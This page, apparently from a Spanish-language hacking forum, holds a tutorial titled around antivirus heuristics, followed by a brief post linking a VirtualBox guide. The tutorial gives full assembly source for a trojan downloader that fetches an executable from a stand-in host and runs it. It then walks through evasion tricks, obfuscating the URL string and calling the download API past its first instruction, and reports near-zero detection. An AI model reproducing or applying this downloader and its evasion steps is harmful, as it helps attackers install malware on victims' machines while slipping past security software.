elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 [2]
11  Seguridad Informática / Análisis y Diseño de Malware / Los antivirus y sus "poderosas" heurísticas en: 21 Junio 2010, 18:04 pm
En este post vamos a ver cuán sencillo es hacer indetectable un troyano. Cogeremos el más simple posible, Troyan.Downloader, un pequeño programa que se baja un exe de una página web y lo ejecuta con CreateProcess.

Éste es el código fuente original, que compila bajo masm32:

Código
  1. .386
  2. .model flat, stdcall ; 32 bit memory model
  3. option casemap :none ; case sensitive
  4.  
  5. include \MASM32\INCLUDE\windows.inc
  6. include \MASM32\INCLUDE\kernel32.inc
  7. include \MASM32\INCLUDE\urlmon.inc
  8. include \MASM32\INCLUDE\shell32.inc
  9.  
  10. includelib \MASM32\LIB\kernel32.lib
  11. includelib \MASM32\LIB\urlmon.lib
  12. includelib \MASM32\LIB\shell32.lib
  13.  
  14. ; #########################################
  15. .data
  16. web db "http://mitroyano.com/test.exe",0
  17. open db "open",0
  18. dir db "test.exe",0 (0) ; buffer for command line
  19. pinfo dd 4 dup (0) ;process handles
  20. startupinfo db 48h dup (0) ;startup info for the process were opening
  21.  
  22. .code
  23.  
  24. start:
  25. push NULL
  26. push 0
  27. push offset dir
  28. push offset web
  29. push NULL
  30. CALL URLDownloadToFile
  31.  
  32. push offset pinfo
  33. push offset startupinfo
  34. push NULL
  35. push NULL
  36. push NULL
  37. push TRUE
  38. push NULL
  39. push NULL
  40. push NULL
  41. push offset dir ; Pointer to name of executable mod
  42. call CreateProcessA
  43.  
  44. push 0
  45. call ExitProcess
  46.  
  47. end start
  48.  
  49. ; ####################
  50.  

He marcado en negrita las tres cosas que son importantes en cuánto a comportamiento vírico se refiere:

(1) un string de una web de dónde se descarga el exe: http://...
(2) la llamada a URLDownloadToFile
(3) la llamada a CreateProcess.

Éste es el análisis del virus antes de modificarlo.


Por cierto, ya es bastante grave que antivirus como F-PROT, AVG, bitdefender no cataloguen correctamente nuestro troyano. Pero sigamos.



Ahora haremos un pequeño cambio. Subsituiremos http por wttp y restauraremos el string al principio del programa:




Código
  1. web DB "wttp://mitroyano.com/troyano.exe", 0
  2. [...]
  3. Lea Eax, [web]
  4. Mov Byte Ptr [Eax], 'h'

Con esto, nos quitamos de encima uno de los antivirus (avira). Aquí tenéis el análisis.

Código:
http://scanner.novirusthanks.org/analysis/e97f5f997c712b39eb038b03db949d7c/UHJveWVjdG8xLmV4ZQ==/

Nuestro siguiente paso va a ser quitar esa llamada tan fea que tenemos a
URLDownloadToFile, que canta muchísimo. ¿Cómo? Pues simplemente vemos con un debugger la primera instrucción que ejecuta la función, que en este caso es mov edi, edi, la copiamos en nuestro programa y luego llamamos a la API con un call eax:

Código
  1. Push NULL
  2. Push 0
  3. push offset dir
  4. push offset web
  5. Push NULL
  6. ;Call URLDownloadToFile
  7. Mov Edi, Edi
  8. Mov Eax, URLDownloadToFile
  9. Inc Eax
  10. Inc Eax
  11. Call Eax
  12.  
Notar que hemos puesto dos inc eax porque la longitud de la instrucción mov edi, edi es dos.

Después de tan complicado cambio, el resultado es que tan sólo Dr.Web lo detecta. ¿Análisis heurístico? ¿Sandboxes? Mejor no digo nada ...


Fuente:
Código:
http://hacking-avanzado.blogspot.com
12  Informática / Tutoriales - Documentación / VirtualBox [Tutorial completo] By ANTRAX en: 21 Junio 2010, 18:00 pm

Les hice un tutorial bien completo con imagenes sobre como instalar VirtualBox, Como configurarlo, como ponerle internet y como pasar archivos de la PC real a la Virtual.

Espero que les sea de su agrado y se que a muchos les servira para testear archivos y realizar sus mods.

http://www.4shared.com/document/6UmavC6a/Instalacion_y_Configuracion_de.html
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines